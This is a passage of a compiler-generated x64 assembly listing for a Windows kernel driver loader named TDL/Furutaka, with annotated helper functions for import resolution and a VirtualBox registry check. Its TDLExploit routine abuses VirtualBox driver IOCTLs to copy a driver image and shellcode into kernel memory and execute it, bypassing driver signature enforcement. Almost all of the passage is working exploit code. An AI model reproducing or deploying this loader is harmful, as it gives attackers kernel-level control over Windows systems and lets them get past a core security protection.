XMMWORD PTR [rax+96] movups XMMWORD PTR [rcx+96], xmm0 add rcx, rdx 
movups xmm1, XMMWORD PTR [rax+112] add rax, rdx movups XMMWORD PTR [rcx-16], xmm1 sub rsi, rdi jne SHORT $LL31@TDLMapDriv movups xmm0, XMMWORD PTR [rax] movups XMMWORD PTR [rcx], xmm0 movups xmm1, XMMWORD PTR [rax+16] movups XMMWORD PTR [rcx+16], xmm1 movups xmm0, XMMWORD PTR [rax+32] movups XMMWORD PTR [rcx+32], xmm0 movups xmm1, XMMWORD PTR [rax+48] movups XMMWORD PTR [rcx+48], xmm1 mov al, BYTE PTR [rax+64] mov BYTE PTR [rcx+64], al ; Line 464 lea rcx, OFFSET FLAT:??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ $LN26@TDLMapDriv: ; Line 467 mov edx, edi call cuiPrintTextW mov rcx, QWORD PTR Buffer$[rbp-256] mov r8, r12 mov rdx, QWORD PTR Image$[rsp] mov edi, r14d add rcx, rdi call memcpy ; Line 469 mov esi, 1 lea rcx, OFFSET FLAT:??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ mov edx, esi call cuiPrintTextW ; Line 470 mov rcx, QWORD PTR Buffer$[rbp-256] mov r8, rbx mov rdx, QWORD PTR KernelImage$[rbp-256] add rcx, rdi call TDLResolveKernelImport ; Line 472 mov edx, esi lea rcx, OFFSET FLAT:??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ call cuiPrintTextW ; Line 473 mov rcx, QWORD PTR Buffer$[rbp-256] lea edx, DWORD PTR [r12+4096] mov r8d, r14d call TDLExploit ; Line 474 mov r15d, r13d ; Line 475 jmp SHORT $LN3@TDLMapDriv $LN13@TDLMapDriv: ; Line 381 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ ; Line 382 jmp SHORT $LN33@TDLMapDriv $LN10@TDLMapDriv: ; Line 369 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; Line 370 jmp SHORT $LN33@TDLMapDriv $LN6@TDLMapDriv: ; Line 349 mov edx, r12d lea rcx, OFFSET FLAT:??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ $LN33@TDLMapDriv: ; Line 478 call 
cuiPrintTextW $LN3@TDLMapDriv: cmp QWORD PTR Buffer$[rbp-256], r13 je SHORT $LN27@TDLMapDriv ; Line 480 mov r9d, 32768 ; 00008000H mov QWORD PTR memIO$[rsp], r13 lea r8, QWORD PTR memIO$[rsp] or rcx, -1 lea rdx, QWORD PTR Buffer$[rbp-256] call QWORD PTR __imp_NtFreeVirtualMemory $LN27@TDLMapDriv: ; Line 484 mov rbx, QWORD PTR [rsp+704] mov eax, r15d add rsp, 640 ; 00000280H pop r15 pop r14 pop r13 pop r12 pop rdi pop rsi pop rbp ret 0 TDLMapDriver ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLExploit _TEXT SEGMENT pLoadTask$ = 64 memIO$ = 72 Cookie$ = 80 vmFast$ = 136 ldrFree$ = 168 paramOut$ = 200 OpenLdr$ = 208 text$ = 272 Shellcode$ = 832 CodeSize$ = 840 DataOffset$ = 848 bytesIO$ = 856 TDLExploit PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 159 $LN26: mov rax, rsp mov QWORD PTR [rax+8], rbx mov QWORD PTR [rax+16], rsi mov QWORD PTR [rax+24], rdi push rbp push r12 push r13 push r14 push r15 lea rbp, QWORD PTR [rax-568] sub rsp, 784 ; 00000310H ; Line 171 mov r10, QWORD PTR g_hVBox xor r13d, r13d mov r12d, r8d mov r15, rcx mov esi, edx mov DWORD PTR bytesIO$[rbp-256], r13d mov QWORD PTR pLoadTask$[rsp], r13 cmp r10, -1 je $LN13@TDLExploit ; Line 180 movups xmm0, XMMWORD PTR ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 182 mov QWORD PTR [rsp+56], r13 lea r9d, QWORD PTR [r13+48] ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea rdi, QWORD PTR Cookie$[rsp] ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 182 lea r8, QWORD PTR Cookie$[rsp] ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea edx, QWORD PTR [rax+56] mov ecx, edx rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 182 lea rax, QWORD PTR bytesIO$[rbp-256] mov DWORD PTR 
Cookie$[rsp+12], edx mov QWORD PTR [rsp+48], rax mov rcx, r10 mov DWORD PTR [rsp+40], edx lea rax, QWORD PTR Cookie$[rsp] mov edx, 2261508 ; 00228204H mov QWORD PTR [rsp+32], rax mov DWORD PTR Cookie$[rsp], 1769107316 ; 69726f74H mov DWORD PTR Cookie$[rsp+8], r9d mov QWORD PTR Cookie$[rsp+16], 1107296322 ; 42000042H mov DWORD PTR Cookie$[rsp+40], r13d mov DWORD PTR Cookie$[rsp+44], 458754 ; 00070002H movdqu XMMWORD PTR Cookie$[rsp+24], xmm0 call QWORD PTR __imp_DeviceIoControl test eax, eax jne SHORT $LN4@TDLExploit ; Line 186 lea rcx, OFFSET FLAT:??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ $LN24@TDLExploit: ; Line 301 mov edx, 1 $LN23@TDLExploit: call cuiPrintTextW jmp $LN3@TDLExploit $LN4@TDLExploit: ; Line 198 movsd xmm0, QWORD PTR ??_C@_08EFILHJLF@furutaka@ ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea rdi, QWORD PTR OpenLdr$[rbp-256] xor eax, eax ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 200 mov QWORD PTR [rsp+56], r13 lea r8, QWORD PTR OpenLdr$[rbp-256] ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea edx, QWORD PTR [rax+64] mov ecx, edx ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 200 mov r9d, edx ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 191 mov eax, DWORD PTR Cookie$[rsp+24] ; Line 194 lea ecx, QWORD PTR [rdx-24] mov DWORD PTR OpenLdr$[rbp-256], eax mov eax, DWORD PTR Cookie$[rsp+28] mov DWORD PTR OpenLdr$[rbp-252], eax ; Line 198 mov al, BYTE PTR ??_C@_08EFILHJLF@furutaka@+8 mov BYTE PTR OpenLdr$[rbp-220], al ; Line 200 lea rax, QWORD PTR bytesIO$[rbp-256] mov QWORD PTR [rsp+48], rax lea rax, QWORD PTR OpenLdr$[rbp-256] mov DWORD PTR [rsp+40], ecx mov DWORD PTR OpenLdr$[rbp-248], edx mov edx, 2261524 ; 00228214H mov DWORD PTR OpenLdr$[rbp-244], ecx mov 
rcx, QWORD PTR g_hVBox mov QWORD PTR [rsp+32], rax mov QWORD PTR OpenLdr$[rbp-240], 1107296322 ; 42000042H mov DWORD PTR OpenLdr$[rbp-232], esi movsd QWORD PTR OpenLdr$[rbp-228], xmm0 call QWORD PTR __imp_DeviceIoControl test eax, eax jne SHORT $LN5@TDLExploit ; Line 204 lea rcx, OFFSET FLAT:??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; Line 205 jmp $LN24@TDLExploit $LN5@TDLExploit: ; Line 208 lea rdx, OFFSET FLAT:??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 209 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, QWORD PTR OpenLdr$[rbp-232] mov rdx, rax call u64tohex_w ; Line 210 mov ebx, 1 lea rcx, QWORD PTR text$[rbp-256] mov edx, ebx call cuiPrintTextW ; Line 213 mov r14, QWORD PTR OpenLdr$[rbp-232] ; Line 215 lea rax, QWORD PTR [rsi+4096] ; Line 216 mov DWORD PTR [rsp+40], 4 lea r9, QWORD PTR memIO$[rsp] xor r8d, r8d mov QWORD PTR memIO$[rsp], rax lea rdx, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rsp+32], 12288 ; 00003000H or rcx, -1 call QWORD PTR __imp_NtAllocateVirtualMemory ; Line 219 mov rcx, QWORD PTR pLoadTask$[rsp] test rcx, rcx je $LN12@TDLExploit ; Line 222 mov eax, DWORD PTR Cookie$[rsp+24] ; Line 235 mov r8, rsi mov DWORD PTR [rcx], eax mov rdx, r15 mov rcx, QWORD PTR pLoadTask$[rsp] mov eax, DWORD PTR Cookie$[rsp+28] mov DWORD PTR [rcx+4], eax lea ecx, DWORD PTR [rsi+104] mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+8], ecx mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+12], 24 mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+16], 1107296322 ; 42000042H mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+20], r13d mov rax, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rax+80], ebx mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD PTR [rax+72], r14 mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD PTR [rax+40], 106496 ; 0001a000H mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD 
PTR [rax+64], r14 mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD PTR [rax+56], r14 mov rax, QWORD PTR pLoadTask$[rsp] mov QWORD PTR [rax+48], r14 mov rcx, QWORD PTR pLoadTask$[rsp] add rcx, 104 ; 00000068H call memcpy ; Line 236 mov rax, QWORD PTR pLoadTask$[rsp] ; Line 238 lea r15d, QWORD PTR [rbx+23] mov QWORD PTR [rsp+56], r13 mov edx, 2261528 ; 00228218H mov DWORD PTR [rax+100], esi lea rax, QWORD PTR bytesIO$[rbp-256] mov r8, QWORD PTR pLoadTask$[rsp] mov rcx, QWORD PTR g_hVBox mov QWORD PTR [rsp+48], rax mov DWORD PTR [rsp+40], r15d mov r9d, DWORD PTR [r8+8] mov QWORD PTR [rsp+32], r8 call QWORD PTR __imp_DeviceIoControl test eax, eax jne SHORT $LN8@TDLExploit ; Line 242 mov edx, ebx lea rcx, OFFSET FLAT:??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; Line 243 jmp $LN23@TDLExploit $LN8@TDLExploit: ; Line 246 lea rdx, OFFSET FLAT:??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 247 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rdx, rax mov rcx, r14 call u64tohex_w ; Line 248 lea rdx, OFFSET FLAT:??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ lea rcx, QWORD PTR text$[rbp-256] call _strcat_w ; Line 249 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rdx, rax mov ecx, esi call ultohex_w ; Line 251 lea rdx, OFFSET FLAT:??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ lea rcx, QWORD PTR text$[rbp-256] call _strcat_w ; Line 252 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rdx, rax lea rcx, QWORD PTR [r14+r12] call u64tohex_w ; Line 253 mov edx, ebx lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 265 mov QWORD PTR [rsp+56], r13 ; File 
C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea rdi, QWORD PTR vmFast$[rbp-256] ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 265 mov edx, 2261580 ; 0022824cH lea r8, QWORD PTR vmFast$[rbp-256] ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea r12d, QWORD PTR [rax+32] mov ecx, r12d ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 265 mov r9d, r12d ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 257 mov eax, DWORD PTR Cookie$[rsp+24] ; Line 265 mov rcx, QWORD PTR g_hVBox mov DWORD PTR vmFast$[rbp-256], eax mov eax, DWORD PTR Cookie$[rsp+28] mov DWORD PTR vmFast$[rbp-252], eax lea rax, QWORD PTR bytesIO$[rbp-256] mov QWORD PTR [rsp+48], rax lea rax, QWORD PTR vmFast$[rbp-256] mov DWORD PTR [rsp+40], r15d mov QWORD PTR [rsp+32], rax mov QWORD PTR vmFast$[rbp-240], 1107296322 ; 42000042H mov DWORD PTR vmFast$[rbp-248], r12d mov DWORD PTR vmFast$[rbp-244], r15d mov QWORD PTR vmFast$[rbp-232], 106496 ; 0001a000H call QWORD PTR __imp_DeviceIoControl mov edx, ebx test eax, eax jne SHORT $LN10@TDLExploit ; Line 269 lea rcx, OFFSET FLAT:??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; Line 270 jmp $LN23@TDLExploit $LN10@TDLExploit: ; Line 273 lea rcx, OFFSET FLAT:??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ call cuiPrintTextW ; Line 276 mov edx, ebx lea rcx, OFFSET FLAT:??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ call cuiPrintTextW ; Line 279 mov rcx, QWORD PTR g_hVBox lea rax, QWORD PTR bytesIO$[rbp-256] mov QWORD PTR [rsp+56], r13 xor r9d, r9d mov QWORD PTR [rsp+48], rax xor r8d, r8d lea rax, QWORD PTR paramOut$[rbp-256] mov DWORD PTR [rsp+40], 8 mov edx, 2261771 ; 0022830bH mov QWORD PTR 
[rsp+32], rax mov QWORD PTR paramOut$[rbp-256], r13 call QWORD PTR __imp_DeviceIoControl ; Line 283 mov edx, ebx lea rcx, OFFSET FLAT:??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ call cuiPrintTextW ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 294 mov QWORD PTR [rsp+56], r13 ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 mov rcx, r12 lea rdi, QWORD PTR ldrFree$[rbp-256] rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 286 mov eax, DWORD PTR Cookie$[rsp+24] ; Line 294 lea r8, QWORD PTR ldrFree$[rbp-256] mov rcx, QWORD PTR g_hVBox mov r9d, r12d mov DWORD PTR ldrFree$[rbp-256], eax mov edx, 2261532 ; 0022821cH mov eax, DWORD PTR Cookie$[rsp+28] mov DWORD PTR ldrFree$[rbp-252], eax lea rax, QWORD PTR bytesIO$[rbp-256] mov QWORD PTR [rsp+48], rax lea rax, QWORD PTR ldrFree$[rbp-256] mov DWORD PTR [rsp+40], r15d mov QWORD PTR [rsp+32], rax mov DWORD PTR ldrFree$[rbp-248], r12d mov DWORD PTR ldrFree$[rbp-244], r15d mov QWORD PTR ldrFree$[rbp-240], 1107296322 ; 42000042H mov QWORD PTR ldrFree$[rbp-232], r14 call QWORD PTR __imp_DeviceIoControl $LN3@TDLExploit: ; Line 301 cmp QWORD PTR pLoadTask$[rsp], r13 je SHORT $LN12@TDLExploit ; Line 303 mov r9d, 32768 ; 00008000H mov QWORD PTR memIO$[rsp], r13 lea r8, QWORD PTR memIO$[rsp] or rcx, -1 lea rdx, QWORD PTR pLoadTask$[rsp] call QWORD PTR __imp_NtFreeVirtualMemory $LN12@TDLExploit: ; Line 306 mov rcx, QWORD PTR g_hVBox cmp rcx, -1 je SHORT $LN13@TDLExploit ; Line 307 call QWORD PTR __imp_CloseHandle ; Line 308 or QWORD PTR g_hVBox, -1 $LN13@TDLExploit: ; Line 310 lea r11, QWORD PTR [rsp+784] mov rbx, QWORD PTR [r11+48] mov rsi, QWORD PTR [r11+56] mov rdi, QWORD PTR [r11+64] mov rsp, r11 pop r15 pop r14 pop r13 pop r12 pop rbp ret 0 TDLExploit ENDP _TEXT ENDS ; Function compile flags: 
/Ogspy ; COMDAT TDLResolveKernelImport
; (The "/Ogspy" token above is the tail of the "; Function compile flags:"
;  comment that closes the preceding line of this listing.)
;
; TDLResolveKernelImport(Image = rcx, KernelImage = rdx, KernelBase = r8)
;
; Walks the import thunk array of the FIRST import descriptor of the PE image
; mapped at `Image` and overwrites each FirstThunk slot with the value returned
; by TDLGetProcAddress(KernelBase, KernelImage, <name>).
;
; Register roles, as assigned below:
;   rbx = Image, r13 = KernelImage, r12 = KernelBase
;   rdi = RVA of the import directory (never advanced, so only one descriptor
;         is processed)
;   rsi = cursor over the lookup thunks, r15 = FirstThunk array, ebp = slot index
;
; The offsets used on the RtlImageNtHeader result match IMAGE_NT_HEADERS64:
;   +132 OptionalHeader.NumberOfRvaAndSizes
;   +144 OptionalHeader.DataDirectory[1].VirtualAddress (import directory)
;
; NOTE(review): rax from RtlImageNtHeader is dereferenced without a NULL test.
; NOTE(review): the value returned by TDLGetProcAddress is stored unconditionally,
;               so a failed lookup (0) leaves a zero in the thunk slot.
_TEXT SEGMENT
Image$ = 80
KernelImage$ = 88
KernelBase$ = 96
TDLResolveKernelImport PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 111
$LN19:
    ; Prologue: spill rbx/rbp/rsi to the caller-provided home slots, push the
    ; remaining callee-saved registers, reserve 32 bytes of shadow space.
    mov QWORD PTR [rsp+8], rbx
    mov QWORD PTR [rsp+16], rbp
    mov QWORD PTR [rsp+24], rsi
    push rdi
    push r12
    push r13
    push r14
    push r15
    sub rsp, 32 ; 00000020H
    mov r12, r8                         ; r12 = KernelBase
    mov r13, rdx                        ; r13 = KernelImage
    mov rbx, rcx                        ; rbx = Image (rcx is passed through to the call)
; Line 119
    call QWORD PTR __imp_RtlImageNtHeader
; Line 121
    ; Leave if the header declares no more than one data directory,
    ; i.e. there is no import directory entry (index 1).
    cmp DWORD PTR [rax+132], 1
    jbe SHORT $LN3@TDLResolve
; Line 124
    mov edi, DWORD PTR [rax+144]        ; rdi = import directory RVA (zero-extended)
; Line 125
    test rdi, rdi
    je SHORT $LN3@TDLResolve            ; RVA of 0: nothing to resolve
; Line 130
    ; Prefer the descriptor's first DWORD (OriginalFirstThunk); if it is 0,
    ; fall back to the DWORD at +16 (FirstThunk).
    mov eax, DWORD PTR [rdi+rbx]
    test eax, eax
    jne SHORT $LN8@TDLResolve
; Line 131
    mov eax, DWORD PTR [rdi+rbx+16]
$LN8@TDLResolve:
; Line 135
    mov esi, eax
    add rsi, rbx                        ; rsi = Image + thunk RVA
    xor ebp, ebp                        ; slot index = 0
    jmp SHORT $LN17@TDLResolve
$LL4@TDLResolve:
; Line 136
    ; rcx holds the current 64-bit thunk value (loaded at $LN17).
    mov r15d, DWORD PTR [rdi+rbx+16]    ; FirstThunk RVA, re-read every iteration
; Line 137
    add r15, rbx                        ; r15 = Image + FirstThunk RVA
    test rcx, rcx
    js SHORT $LN9@TDLResolve            ; top bit set: import by ordinal
; Line 139
    ; Import by name: r8 = Image + thunk RVA + 2, skipping the 2-byte hint.
    lea r8, QWORD PTR [rbx+2]
    add r8, rcx
; Line 140
    jmp SHORT $LN2@TDLResolve
$LN9@TDLResolve:
; Line 142
    ; NOTE(review): the low 16 bits of the thunk are passed on as the name
    ; argument; TDLGetProcAddress hands that value to RtlInitString as a string
    ; pointer. Confirm the ordinal path is never reached.
    movzx r8d, cx
$LN2@TDLResolve:
; Line 135
    mov rdx, r13                        ; arg2 = KernelImage
    mov rcx, r12                        ; arg1 = KernelBase
    call TDLGetProcAddress
    mov QWORD PTR [r15+rbp*8], rax      ; patch FirstThunk[index] with the result
    inc ebp
    add rsi, 8                          ; next 8-byte thunk
$LN17@TDLResolve:
    mov rcx, QWORD PTR [rsi]
    test rcx, rcx
    jne SHORT $LL4@TDLResolve           ; a zero thunk terminates the array
$LN3@TDLResolve:
; Line 144
    ; Epilogue: restore the spilled registers and return.
    mov rbx, QWORD PTR [rsp+80]
    mov rbp, QWORD PTR [rsp+88]
    mov rsi, QWORD PTR [rsp+96]
    add rsp, 32 ; 00000020H
    pop r15
    pop r14
    pop r13
    pop r12
    pop rdi
    ret 0
TDLResolveKernelImport ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
; COMDAT TDLGetProcAddress
;
; TDLGetProcAddress(KernelBase = rcx, KernelImage = rdx, FunctionName = r8)
;
; Looks FunctionName up in the module mapped at KernelImage with
; LdrGetProcedureAddress and returns the result rebased onto KernelBase:
;   (pfn - KernelImage) + KernelBase
; Returns 0 when LdrGetProcedureAddress reports a negative status.
_TEXT SEGMENT
cStr$ = 32
KernelBase$ = 64
KernelImage$ = 72
FunctionName$ = 80
pfn$ = 88
TDLGetProcAddress PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 87
$LN5:
    mov QWORD PTR [rsp+8], rbx
    push rdi
    sub rsp, 48 ; 00000030H
; Line 89
    and QWORD PTR pfn$[rsp], 0          ; pfn = NULL
    mov rbx, rdx                        ; rbx = KernelImage
    mov rdi, rcx                        ; rdi = KernelBase
; Line 91
    mov rdx, r8                         ; source string = FunctionName
    lea rcx, QWORD PTR cStr$[rsp]       ; destination = local cStr
    call QWORD PTR __imp_RtlInitString
; Line 92
    ; LdrGetProcedureAddress(KernelImage, &cStr, 0, &pfn)
    lea r9, QWORD PTR pfn$[rsp]
    xor r8d, r8d
    lea rdx, QWORD PTR cStr$[rsp]
    mov rcx, rbx
    call QWORD PTR __imp_LdrGetProcedureAddress
    test eax, eax
    jns SHORT $LN2@TDLGetProc           ; status >= 0: lookup succeeded
; Line 93
    xor eax, eax                        ; failure: return 0
    jmp SHORT $LN1@TDLGetProc
$LN2@TDLGetProc:
; Line 95
    ; Convert the address inside the local mapping into the same offset
    ; relative to KernelBase.
    mov rax, QWORD PTR pfn$[rsp]
    sub rax, rbx
    add rax, rdi
$LN1@TDLGetProc:
; Line 96
    mov rbx, QWORD PTR [rsp+64]
    add rsp, 48 ; 00000030H
    pop rdi
    ret 0
TDLGetProcAddress ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
; COMDAT TDLVBoxInstalled
;
; TDLVBoxInstalled(void)
;
; Probes for a registry key under HKEY_LOCAL_MACHINE (0x80000002) with
; KEY_READ access (0x00020019). The decorated literal name shows that the
; sub-key path begins with "Software\Oracle"; the rest is not visible in this
; listing. Returns 1 in eax if a key handle was obtained, else 0. The handle is
; closed before returning and no value under the key is read.
;
; NOTE(review): the RegOpenKeyExW status code is discarded; success is inferred
; only from hKey being non-zero after the call.
_TEXT SEGMENT
hKey$ = 64
TDLVBoxInstalled PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 57
$LN5:
    push rbx
    sub rsp, 48 ; 00000030H
; Line 60
    and QWORD PTR hKey$[rsp], 0         ; hKey = NULL
; Line 62
    ; RegOpenKeyExW(HKEY_LOCAL_MACHINE, <sub-key>, 0, KEY_READ, &hKey)
    lea rax, QWORD PTR hKey$[rsp]
    mov r9d, 131097 ; 00020019H
    mov QWORD PTR [rsp+32], rax
    xor r8d, r8d
    lea rdx, OFFSET FLAT:??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@
    mov rcx, -2147483646 ; ffffffff80000002H
    call QWORD PTR __imp_RegOpenKeyExW
; Line 65
    mov rcx, QWORD PTR hKey$[rsp]
    xor ebx, ebx
    test rcx, rcx
    setne bl                            ; ebx = (hKey != NULL)
; Line 67
    test rcx, rcx
    je SHORT $LN2@TDLVBoxIns            ; no handle, nothing to close
; Line 68
    call QWORD PTR __imp_RegCloseKey
$LN2@TDLVBoxIns:
; Line 71
    mov eax, ebx                        ; return value
; Line 72
    add rsp, 48 ; 00000030H
    pop rbx
    ret 0
TDLVBoxInstalled ENDP
_TEXT ENDS
END